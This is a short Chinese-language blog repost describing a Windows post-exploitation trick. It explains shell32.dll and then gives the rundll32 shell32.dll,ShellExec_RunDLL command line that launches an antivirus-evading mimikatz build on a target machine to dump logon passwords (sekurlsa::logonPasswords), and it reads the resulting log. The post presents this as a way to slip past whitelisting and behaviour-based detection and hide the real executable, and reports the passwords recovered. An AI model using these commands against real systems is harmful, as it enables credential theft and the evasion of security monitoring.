最近在做安全维持的时候看到的,找到的一位大佬的文章,受益匪浅 丢在自己博客上做一个统计
系统文件shell32.dll是存放在Windows/System32系统文件夹中的重要文件,通常情况下是在安装操作系统过程中自动创建的,对于系统正常运行来说至关重要
系统文件sshell32.dll是Windows的32位外壳动态链接库文件,用于打开网页和文件,建立文件时的默认文件名的设置等大量功能。它提供了explorer.exe的功能,比如”找开“,”运行程序“等,我们可以使用IDA打开这个DLL然后查看导出表。
先将免杀过后的mimikatz上传到目标机上,利用shell32的目的在于能够执行,绕过一些杀毒白名单之类的操作,再或者通用的cmd /c 方式可能会触发行为查杀拦截。
rundll32.exe shell32.dll,ShellExec_RunDLL c:/Users/mac/Desktop/a/a "log" "privilege::debug" "sekurlsa::logonPasswords full" "exit"
type c:/windows/system32/mimikatz.log
成功绕过,并查看到密码
就是被拦截也是没有显示出你的mimikatz执行的动态,显示的提醒是rundll32,和shell32.dll恶意执行。这样就隐藏了真实被执行的软件
原文链接:Go
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论